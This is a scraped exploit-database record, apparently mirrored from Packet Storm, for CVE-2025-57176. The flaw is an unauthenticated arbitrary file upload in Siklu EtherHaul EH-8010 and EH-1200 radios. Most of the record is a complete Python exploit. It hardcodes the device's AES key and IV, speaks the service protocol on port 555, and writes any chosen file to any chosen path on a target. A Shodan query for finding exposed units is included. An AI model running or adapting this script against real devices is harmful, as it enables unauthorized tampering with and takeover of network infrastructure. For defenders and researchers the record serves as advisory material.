{“lastseen”:”2026-01-20T15:37:22″,”description”:”Siklu EtherHaul Series EH-8010 and EH-1200 with firmware versions between 7.4.0 and 10.7.3 suffer from an unauthenticated arbitrary file upload vulnerability…”,”published”:”2026-01-20T00:00:00″,”modified”:”2026-01-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Siklu EtherHaul Series EH-8010 \/ EH-1200 Arbitrary File Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:214067″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-57176″],”sourceData”:”# Exploit Title: Siklu EtherHaul Series – Unauthenticated Arbitrary File Upload\\n # Shodan Dork: \\”EH-8010\\” or \\”EH-1200\\”\\n # Date: 2025-08-02\\n # Exploit Author: semaja2 – Andrew James \\u003csemaja2@gmail.com\\u003e\\n # Vendor Homepage: https:\/\/www.ceragon.com\/products\/siklu-by-ceragon\\n # Software Link: ftp:\/\/ftp.bubakov.net\/siklu\/\\n # Version: EH-8010 and EH-1200 Firmware 7.4.0 – 10.7.3\\n # Tested on: Linux\\n # CVE: CVE-2025-57176\\n # Blog: https:\/\/semaja2.net\/2025\/08\/03\/siklu-eh-unauth-arbitrary-file-upload\/\\n \\n #!\/usr\/bin\/env python3\\n import argparse, socket, struct\\n from Crypto.Cipher import AES\\n \\n PORT = 555\\n HDR_LEN = 0x90\\n IV0 = struct.pack(‘\\u003c4I’, 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72)\\n KEY = bytes([\\n 0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5,\\n 0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17,\\n 0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0,\\n 0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82\\n ])\\n \\n def recv_exact(sock: socket.socket, n: int) -\\u003e bytes:\\n out = bytearray()\\n while len(out) \\u003c n:\\n chunk = sock.recv(n – len(out))\\n if not chunk:\\n raise ConnectionError(‘socket closed’)\\n out += chunk\\n return bytes(out)\\n \\n def pad16_zero(b: bytes) -\\u003e bytes:\\n r = len(b) \\u0026 0x0F\\n return b if r == 0 else (b + b’\\\\x00′ * (16 – r))\\n \\n def hdr_checksum(hdr: bytes) -\\u003e int:\\n return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) \\u0026 0xFFFFFFFF\\n \\n def build_header(flag: int, msg: int, payload_len: int, path: bytes) -\\u003e bytes:\\n hdr = bytearray(HDR_LEN)\\n hdr[0] = flag \\u0026 0xFF\\n hdr[1] = msg \\u0026 0xFF\\n struct.pack_into(‘\\u003cI’, hdr, 0x08, payload_len \\u0026 0xFFFFFFFF)\\n p = path if path.endswith(b’\\\\x00′) else (path + b’\\\\x00′)\\n max_path = HDR_LEN – 0x10\\n hdr[0x10:0x10 + min(len(p), max_path)] = p[:max_path]\\n struct.pack_into(‘\\u003cI’, hdr, 0x0C, hdr_checksum(hdr))\\n return bytes(hdr)\\n \\n class RFPipeSession:\\n def __init__(self, key: bytes, iv0: bytes):\\n self.key = key\\n self.send_iv = iv0\\n self.recv_iv = iv0\\n def enc_send(self, sock: socket.socket, data: bytes) -\\u003e None:\\n cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv)\\n ct = cipher.encrypt(data)\\n self.send_iv = ct[-16:]\\n sock.sendall(ct)\\n def dec_recv(self, sock: socket.socket, n_plain: int) -\\u003e bytes:\\n if n_plain \\u003c= 0:\\n return b”\\n n_padded = (n_plain + 15) \\u0026 ~15\\n ct = recv_exact(sock, n_padded)\\n cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)\\n pt = cipher.decrypt(ct)\\n self.recv_iv = ct[-16:]\\n return pt[:n_plain]\\n def send_header(self, sock: socket.socket, hdr_plain: bytes) -\\u003e None:\\n if len(hdr_plain) != HDR_LEN:\\n raise ValueError(‘header must be 0x90 bytes’)\\n self.enc_send(sock, hdr_plain)\\n def recv_header(self, sock: socket.socket) -\\u003e bytes:\\n ct = recv_exact(sock, HDR_LEN)\\n cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)\\n pt = cipher.decrypt(ct)\\n self.recv_iv = ct[-16:]\\n return pt\\n \\n def connect_any(host: str, port: int) -\\u003e socket.socket:\\n infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)\\n last_err = None\\n for fam, st, proto, _, sa in infos:\\n s = socket.socket(fam, st, proto)\\n try:\\n s.connect(sa)\\n return s\\n except Exception as e:\\n last_err = e\\n s.close()\\n raise ConnectionError(f’connect failed: {last_err}’)\\n \\n def main():\\n ap = argparse.ArgumentParser(description=’rfpiped file upload client (msg 0x04)’)\\n ap.add_argument(‘target’, help=’IPv4\/IPv6 address’)\\n ap.add_argument(‘–path’, required=True, help=’remote path string for header+0x10 (NUL will be appended)’)\\n ap.add_argument(‘–file’, required=True, help=’local file to send as payload’)\\n ap.add_argument(‘–recv’, action=’store_true’, help=’receive and print server ACK\/response’)\\n args = ap.parse_args()\\n \\n with open(args.file, ‘rb’) as f:\\n payload = f.read()\\n path_bytes = args.path.encode(‘utf-8’)\\n hdr_plain = build_header(flag=0x00, msg=0x04, payload_len=len(payload), path=path_bytes)\\n \\n sess = RFPipeSession(KEY, IV0)\\n with connect_any(args.target, PORT) as s:\\n sess.send_header(s, hdr_plain)\\n if payload:\\n sess.enc_send(s, pad16_zero(payload))\\n if args.recv:\\n rh = sess.recv_header(s)\\n flag = rh[0]; rmsg = rh[1]\\n rlen = struct.unpack_from(‘\\u003cI’, rh, 0x08)[0]\\n print(f’Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}’)\\n if rmsg in (0x03, 0x05):\\n return\\n if rlen:\\n body = sess.dec_recv(s, rlen)\\n if body.endswith(b’\\\\x00′):\\n body = body[:-1]\\n try:\\n print(body.decode(‘utf-8′, errors=’replace’))\\n except Exception:\\n print(body.hex())\\n \\n if __name__ == ‘__main__’:\\n main()”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214067″,”cvss”:{“score”:4.3,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:L\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214067\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-20T15:37:22″,”description”:”Siklu EtherHaul Series EH-8010 and EH-1200 with firmware versions between 7.4.0 and 10.7.3 suffer from an unauthenticated arbitrary file upload vulnerability…”,”published”:”2026-01-20T00:00:00″,”modified”:”2026-01-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Siklu EtherHaul Series EH-8010…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,123,12,21,13,53,7,11,5],"class_list":["post-36526","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-43","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n